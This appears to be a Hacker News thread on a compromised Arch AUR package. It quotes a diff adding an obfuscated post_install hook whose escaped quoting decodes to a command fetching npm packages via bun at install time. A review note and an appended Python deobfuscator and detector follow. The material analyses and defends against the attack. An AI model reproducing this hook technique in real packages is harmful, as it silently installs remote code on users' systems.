Hacker News

Shank, today at 2:40 PM (1 reply)

Is there any information on whether this is the same attack vector (orphaned packages that were adopted)? I believe they already locked down adoption, but maybe also a combination of existing maintainers being taken over?


Replies

cge, today at 2:57 PM

The reported commit [1] suggests to me that it was an account compromise of some sort, not orphan+adopt: the committer is the same in git, but the contact email changes in the PKGBUILD.

This doesn't necessarily seem 'more elaborate': it is attempting to be better obfuscated against automated checks at the cost of being very obvious to anyone doing even a cursory review of the install scripts. It's also likely something that would be caught instantly by even an extremely naive LLM, as seems to have been the case here. There's simply no legitimate reason why an install script would ever do something like this:

  diff --git a/htbrowser-bin-deps.install b/htbrowser-bin-deps.install
  new file mode 100644
  index 000000000000..9806501accad
  --- /dev/null
  +++ b/htbrowser-bin-deps.install
  @@ -0,0 +1,3 @@
  +post_install() {
  +  $'\x63'"d" "/"'t'"m"'p' && "b"'u''n' 'a'"d"'d' $'\141\x6e''s'"i""-"$'\143''o''l''o''r'$'\x73' 'n'"e"'x'"t""f"'i''l''e''-''j''s'
  +}
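Review bot: the entire post_install body is assembled from ANSI-C escapes (`$'\x63'`, `$'\141...'`) and one-character quote fragments, which an install hook never needs and which exists only to defeat pattern-based checks; once the quoting is resolved the hook runs `cd /tmp && bun add ansi-colors nextfile-js`, fetching two packages from the network at package install time instead of declaring them as dependencies in the PKGBUILD. This should be reverted and flagged, not merged, and a repository-side lint that rejects any `$'` quoting or multi-fragment words in `.install` files would have caught it without needing a human or LLM review.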

[1]: https://aur.archlinux.org/cgit/aur.git/commit/?h=htbrowser-b...
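To show why this style of obfuscation is trivial to undo mechanically, here is an added Python example (not from the thread or from the AUR tooling) that resolves bash single, double and ANSI-C quoting for one line of the hook above and flags install hooks that rely on it; it assumes no variable expansion or escaped quotes inside `$'...'`, which holds for the quoted commit.

```python
import re

# The post_install body quoted in the comment above (copied from the diff).
HOOK_LINE = (r"""$'\x63'"d" "/"'t'"m"'p' && "b"'u''n' 'a'"d"'d' """
             r"""$'\141\x6e''s'"i""-"$'\143''o''l''o''r'$'\x73' 'n'"e"'x'"t""f"'i''l''e''-''j''s'""")

ANSI_ESC = re.compile(r"\\(x[0-9a-fA-F]{1,2}|[0-7]{1,3}|.)")
FRAGMENT = re.compile(r"\$'[^']*'|'[^']*'|\"[^\"]*\"")


def ansi_c(body):
    """Decode the subset of $'...' escapes bash supports: \\xHH, \\NNN octal, \\n, \\t."""
    def sub(m):
        e = m.group(1)
        if e[0] == "x":
            return chr(int(e[1:], 16))
        if e[0] in "01234567":
            return chr(int(e, 8))
        return {"n": "\n", "t": "\t"}.get(e, e)
    return ANSI_ESC.sub(sub, body)


def split_words(line):
    """Split on whitespace while keeping quoted spans inside one word (no escape handling)."""
    words, cur, i = [], [], 0
    while i < len(line):
        c = line[i]
        if c.isspace():
            if cur:
                words.append("".join(cur))
                cur = []
            i += 1
        elif c == "'" or line.startswith("$'", i) or c == '"':
            j = line.index("'" if c != '"' else '"', i + (2 if c == "$" else 1))
            cur.append(line[i:j + 1])
            i = j + 1
        else:
            cur.append(c)
            i += 1
    if cur:
        words.append("".join(cur))
    return words


def unquote_word(word):
    """Concatenate the fragments of one word as bash would after quote removal."""
    return "".join(ansi_c(f[2:-1]) if f.startswith("$'") else f[1:-1] if f[0] in "'\"" else f
                   for f in re.findall(r"\$'[^']*'|'[^']*'|\"[^\"]*\"|[^'\"$]+|\$", word))


def deobfuscate(line):
    return " ".join(unquote_word(w) for w in split_words(line))


def is_suspicious(line, max_fragments=2):
    """Flag ANSI-C quoting or words stitched from more than max_fragments quoted pieces."""
    return any("$'" in w or len(FRAGMENT.findall(w)) > max_fragments for w in split_words(line))
```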